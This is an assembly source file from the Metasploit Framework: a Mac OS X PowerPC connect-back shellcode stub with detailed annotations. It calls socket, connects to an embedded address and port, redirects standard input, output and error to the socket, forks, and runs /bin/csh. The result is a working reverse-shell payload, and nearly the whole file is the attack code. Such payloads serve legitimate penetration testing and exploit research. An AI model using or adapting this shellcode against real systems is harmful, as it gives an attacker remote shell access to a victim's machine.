GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/osx/ppc/single_reverse_tcp.asm
;;
;
; Name: single_reverse_tcp
; Qualities: Can Have Nulls
; Platforms: MacOS X / PPC
; Authors: H D Moore <hdm [at] metasploit.com>
; Version: $Revision: 1612 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Connect back and spawn a shell
;
;
;;
.globl _main
.text

;-----------------------------------------------------------------------
; _main -- connect-back shell stub (Mac OS X / 32-bit PowerPC)
;
; Call sequence, exactly as written below:
;   1. socket(2, 1, 6)                  syscall 97, descriptor kept in r30
;   2. connect(r30, sockaddr, 16)       syscall 98, sockaddr embedded inline
;   3. dup2(r30, fd) for fd = 2, 1, 0   syscall 90
;   4. fork()                           syscall 2
;   5. execve("/bin/csh", argv, NULL)   syscall 59
;
; Syscall pattern used throughout: r0 = syscall number, arguments from
; r3 upward, then `sc`.
;
; NOTE(review): on Darwin/PPC the kernel is understood to resume one
; instruction past `sc` on success, so the instruction directly after
; each `sc` is a failure-path slot -- confirm against the target kernel.
; None of those slots branches away, so a failed call simply falls
; through into the next step; there is no error handling.
;
; The code is position-independent: both data addresses (the sockaddr
; and the shell path) are recovered from the link register rather than
; from absolute symbols.  The `addi r3, r3, 28` offset in _exec_shell
; depends on the exact instruction count that follows it; do not insert
; or remove instructions there.
;
; What this looks like from the host: one outbound TCP connection,
; descriptors 0-2 re-pointed at that socket, a fork, and then /bin/csh
; started with the socket as its stdin/stdout/stderr.
;-----------------------------------------------------------------------
_main:
        ;; socket
        li      r3, 2                   ; domain   = 2 (AF_INET)
        li      r4, 1                   ; type     = 1 (SOCK_STREAM)
        li      r5, 6                   ; protocol = 6 (IPPROTO_TCP)
        li      r0, 97                  ; syscall number: socket
        sc
        xor     r0, r0, r0              ; slot after sc (see header note)
        mr      r30, r3                 ; r30 = socket descriptor, reused below

        bl      _do_connect             ; LR := address of the two words below
        .long   0x00022211              ; sin_len=0x00, sin_family=0x02, sin_port=0x2211
        .long   0x7f000001              ; sin_addr = 127.0.0.1
        ; The loopback address and port look like placeholders; presumably
        ; whatever emits this stub overwrites them -- confirm.  The zero
        ; bytes in these words match the "Can Have Nulls" quality above.

_do_connect:
        mflr    r4                      ; r4 = &sockaddr (set by the bl above)
        li      r5, 16                  ; addrlen = 16 bytes
        li      r0, 98                  ; syscall number: connect
        mr      r3, r30                 ; r3 = socket descriptor
        sc
        xor.    r5, r5, r5              ; slot after sc (see header note)

_dup2_init:
        li      r5, 2                   ; start with fd 2 and count down

_dup2_loop:
        li      r0, 90                  ; syscall number: dup2
        mr      r3, r30                 ; oldfd = socket
        mr      r4, r5                  ; newfd = current counter (2, 1, 0)
        sc
        xor     r0, r0, r0              ; slot after sc (see header note)
        subi    r5, r5, 1               ; next lower descriptor
        cmpwi   r5, -1                  ; finished once the counter passes 0
        bnel    _dup2_loop              ; loop while r5 != -1 (also writes LR)

_do_fork:
        li      r0, 2                   ; syscall number: fork
        sc
        xor.    r5, r5, r5              ; slot after sc (see header note)

_exec_shell:
        xor.    r5, r5, r5              ; r5 = 0 (envp) and CR0 = "equal"
        bnel    _exec_shell             ; never taken (CR0 is EQ); used only
                                        ; because a linking branch loads LR
                                        ; with the next instruction's address
        mflr    r3                      ; r3 = address of this mflr
        addi    r3, r3, 28              ; + 7 instructions * 4 bytes = _shell_path
        stw     r3, -8(r1)              ; argv[0] = path
        stw     r5, -4(r1)              ; argv[1] = NULL
        subi    r4, r1, 8               ; r4 = {path, 0}
        li      r0, 59                  ; syscall number: execve
        sc                              ; execve(path, argv, NULL)

; Author's note: csh removes the need for setuid()
_shell_path:
        .ascii  "/bin/csh"
        .long   0x00414243              ; big-endian bytes 00 41 42 43: the leading
                                        ; 0x00 terminates the path, "ABC" is padding